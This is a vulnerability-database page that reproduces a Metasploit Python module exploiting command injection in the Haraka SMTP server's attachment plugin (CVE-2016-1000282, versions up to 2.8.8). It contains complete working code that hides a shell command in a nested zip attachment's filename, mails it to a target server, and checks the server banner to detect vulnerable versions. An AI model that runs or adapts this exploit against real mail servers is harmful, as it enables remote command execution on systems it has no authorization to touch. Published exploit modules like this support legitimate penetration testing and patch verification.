Vulners
Lucene search
Haraka SMTP Command Injection
🗓️ 31 Mar 2017 22:07:55Reported by xychix <xychix[AT]hotmail.com>, smfreegard, Adam Cammack <adam_cammack[AT]rapid7.com>Type 
metasploit🔗 www.rapid7.com👁 65 Views
#!/usr/bin/env python3
# Vendor Homepage: https://haraka.github.io/
# Software Link: https://github.com/haraka/Haraka
# Exploit github: http://github.com/outflankbv/Exploits/
# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
# Version: <= Haraka 2.8.8 (with attachment plugin enabled)
# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
# Tested versions: 2.8.8 and 2.7.2
# Thanks to: Dexlab.nl for asking me to look at Haraka.
import smtplib
import re
from distutils.version import StrictVersion
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import zipfile
try:
# Python 2 plain strings are bytes
from StringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
from metasploit import module
metadata = {
"name": "Haraka SMTP Command Injection",
"description": """
The Haraka SMTP server comes with a plugin for processing attachments.
Versions before 2.8.9 can be vulnerable to command injection
""",
"authors": [
"xychix <xychix[AT]hotmail.com>",
"smfreegard",
"Adam Cammack <adam_cammack[AT]rapid7.com>",
],
"date": "2017-01-26",
"references": [
{"type": "cve", "ref": "2016-1000282"},
{"type": "edb", "ref": "41162"},
{"type": "url", "ref": "https://github.com/haraka/Haraka/pull/1606"},
],
"type": "remote_exploit_cmd_stager",
"rank": "excellent",
"wfsdelay": 5,
"privileged": True,
"targets": [
{"platform": "linux", "arch": "x64"},
{"platform": "linux", "arch": "x86"},
],
"payload": {"command_stager_flavor": "wget"},
"options": {
"email_to": {
"type": "string",
"description": "Email to send to, must be accepted by the server",
"required": True,
"default": "admin@localhost",
},
"email_from": {
"type": "string",
"description": "Address to send from",
"required": True,
"default": "[email protected]",
},
"rhost": {
"type": "address",
"description": "Target server",
"required": True,
"default": None,
},
"rport": {
"type": "port",
"description": "Target server port",
"required": True,
"default": 25,
},
"command": {
"type": "string",
"description": "Command to run on the target",
"required": True,
"default": "/bin/echo hello",
},
},
"notes": {"AKA": ["Harakiri"]},
}
def send_mail(to, mailserver, cmd, mfrom, port):
msg = MIMEMultipart()
html = "harakiri"
msg["Subject"] = "harakiri"
msg["From"] = mfrom
msg["To"] = to
msg.attach(MIMEText(html))
module.log(
"Send harariki to %s, commandline: %s , mailserver %s is used for delivery"
% (to, cmd, mailserver),
"debug",
)
part = MIMEApplication(create_zip(cmd), Name="harakiri.zip")
part["Content-Disposition"] = 'attachment; filename="harakiri.zip"'
msg.attach(part)
module.log("Sending mail to target server...")
module.log(msg.as_string(), "debug")
s = smtplib.SMTP(mailserver, port)
try:
resp = s.sendmail(mfrom, to, msg.as_string())
except smtplib.SMTPDataError as err:
if err[0] == 450:
module.log("Triggered bug in target server (%s)" % err[1], "good")
s.close()
return True
module.log("Bug not triggered in target server", "error")
module.log(
"it may not be vulnerable or have the attachment plugin activated", "error"
)
s.close()
return False
class InMemoryZip(object):
def __init__(self):
self.in_memory_zip = BytesIO()
def append(self, filename_in_zip, file_contents):
zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
zf.writestr(filename_in_zip, file_contents)
for zfile in zf.filelist:
zfile.create_system = 0
return self
def read(self):
self.in_memory_zip.seek(0)
return self.in_memory_zip.read()
def create_zip(cmd="touch /tmp/harakiri"):
z1 = InMemoryZip()
z2 = InMemoryZip()
z2.append(
"harakiri.txt",
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.",
)
z1.append('a";%s;echo "a.zip' % cmd, z2.read())
return z1.read()
def check_banner(args):
module.log(
"{}:{} Starting banner check for Haraka < 2.8.9".format(
args["rhost"], args["rport"]
),
level="debug",
)
c = smtplib.SMTP()
try:
(code, banner) = c.connect(args["rhost"], int(args["rport"]))
except:
return "unknown"
c.quit()
if code == 220 and "Haraka" in banner:
versions = re.findall("(\d+\.\d+\.\d+)", banner)
if versions:
if StrictVersion(versions[0]) < StrictVersion("2.8.9"):
return "appears"
else:
return "safe"
else:
return "detected"
elif code == 220:
return "detected"
else:
return "unknown"
def exploit(args):
send_mail(
args["email_to"],
args["rhost"],
args["command"],
args["email_from"],
int(args["rport"]),
)
if __name__ == "__main__":
module.run(metadata, exploit, soft_check=check_banner)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2024 14:56Current
7.4High risk
Vulners AI Score7.4